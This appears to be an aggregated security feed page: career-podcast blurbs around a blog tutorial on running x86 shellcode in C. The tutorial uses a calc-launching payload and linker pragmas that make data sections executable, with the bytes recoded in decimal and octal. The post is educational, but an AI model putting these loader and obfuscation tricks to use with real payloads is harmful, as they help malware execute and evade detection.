Ever wish you had a cybersecurity expert on-call to answer your career questions? Here’s your chance! In this open Q&A webinar, Keatron Evans, Infosec instructor and Managing Partner at KM Cyber Security, answered anything and everything related to getting started in cybersecurity and helping take your career to the next level. This episode of the Cyber Work podcast is a rebroadcast of a webinar featuring Keatron Evans. In this podcast, you'll learn everything you need to know about getting started and progressing in your cybersecurity career, including where Keatron got his start in cybersecurity, how to boost your cybersecurity skills on your own and why some employers weigh aptitude over experience.


The human element of cybersecurity careers | Guest Cheryl Kerrigan

By: Infosec
2 September 2019 at 07:00

Cheryl Kerrigan, Vice President of People at BlueCat, discusses the importance of communication, soft skills and healthy employee cultures in modern cybersecurity companies.


Running Shellcode Directly in C

27 August 2019 at 19:15

Here's a cool thing I figured out about position-independent code. I would rephrase the title as running position-independent code rather than shellcode. See my previous article, Executing Shellcode Directly, where I used a minimal PE and pointed AddressOfEntryPoint at the beginning of the PIC.

So the goal is to run shellcode in C without any function pointers or any functions at all, not even a main function 🙂 For example, this is all the code: I declare an array named "main" and initialize it with the shellcode. I am using Microsoft's Visual C compiler with no parameters. The bytes are 32-bit x86 shellcode (they walk the PEB via fs:[0x30], resolve CreateProcessA from kernel32's export table and launch calc), so build a 32-bit binary.

char main[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";

After compiling, it of course won't run. Why? Because the initialized data ends up in the ".data" section.

This section has no execute permission, so let's add execute permission to it and see.

That's it! The position-independent code executes nicely 🙂

Well, changing section flags by hand each time you want to run shellcode is a hassle. Let's tell the linker to give Execute and Write permissions to the ".data" section at link time.

/*
* Author: @OsandaMalith
* Website: https://osandamalith.com
*/
#pragma comment(linker,"/SECTION:.data,EW")

char main[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";

Another trick is to place the shellcode in the ".rdata" section (by declaring the array const) and merge that section into ".text". And of course you can give Execute permission to ".rdata", as we did with ".data" before, and it will execute as well.

/*
* Author: @OsandaMalith
* Website: https://osandamalith.com
*/
#pragma comment(linker,"/MERGE:.rdata=.text")

char const main[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";

Now if you see our code is merged in the ‘.text’ section and it will execute nicely.

You can also place the shellcode directly in the ".text" section, without modifying the PE structure afterwards, like this. Thanks to @yair_omer for mentioning this.

#pragma section(".text")

__declspec(allocate(".text")) char main[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";

You can also write shellcode in any number base. For example in decimals:

/*
* Author: @OsandaMalith
* Website: https://osandamalith.com
*/
#pragma comment(linker,"/SECTION:.data,EW")
int main[] = {
	-1869574000, -1869574000, -1956324559, 2139828347,
	478120716, -1962391669, 1066082423, 856456832,
	-947260811, -1958971389, -1040091049, 18905739,
	-1948415545, -972968140, 1128169797, 1969317234,
	142508530, 1936024431, 2055989621, 1724317988,
	-1955648373, -956228486, -55608181, -645282047,
	-497811535, 1633904893, -494312596, 1397969490,
	1397969747, -671132846
};

This is in octal.

/*
* Author: @OsandaMalith
* Website: https://osandamalith.com
*/
#pragma comment(linker,"/SECTION:.data,EW")
int main[] = {
	022044110220, 022044110220, 021331155461, 017742630173,
	03437705414, 021302043613, 07742620167, 06303077200,
	030742371165, 021317074003, 030200274127, 0110075213,
	021367304707, 030600327464, 010317500505, 016530262562,
	01037500762, 016331261557, 017242764565, 014661600444,
	021333626213, 030700216172, 037453676213, 033142343401,
	034224777661, 014130664375, 034242261554, 012324651122,
	012324651523, 032777651522
};

Under GCC you don't need to change section permissions; it will automatically be placed in the ".text" section. Make sure your code is position independent, or it won't work on other Windows systems, because DLLs are loaded at different addresses. In this way you can execute your shellcode without any function pointers. You can check out some of my public shellcodes here.

How to become a cybersecurity analyst | Guest Jonathan Butler

By: Infosec
26 August 2019 at 07:00

Jonathan Butler, Professional Services & Security Analytics Manager at Distil Networks, discusses his security analyst journey, what someone should like doing if they plan on going into the field, and the future of security analytics as a whole.

